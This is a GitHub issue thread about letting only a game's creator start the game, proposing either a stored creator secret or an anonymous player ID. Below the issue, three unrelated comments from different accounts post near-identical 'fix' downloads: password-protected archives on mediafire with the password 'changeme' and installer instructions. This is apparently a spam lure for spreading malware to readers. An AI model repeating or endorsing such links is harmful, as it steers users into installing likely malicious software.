### ISSUE TITLE
add creator identifier to creating game flow

### ISSUE THREAD

**Issue by Trullfax** [Trullfax/flashbackfiesta#30]
At this point anyone can start the game. If only the creator should be able to start the game, a creator identifier is needed. 

### Simple solution: ###
When a game is created, a creator secret is generated and stored in the database and in the browser's internal memory. When the setup page is reached, equality is checked. 

### Alternative solution (for note): ###
When creating a game, a player is created anonymously (without name and avatar, but with is_anonymous = true). The player_id is stored in the database and in internal storage (as when creating a real player) and we check for equality. Extra checks are required when updating instead of creating a player.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
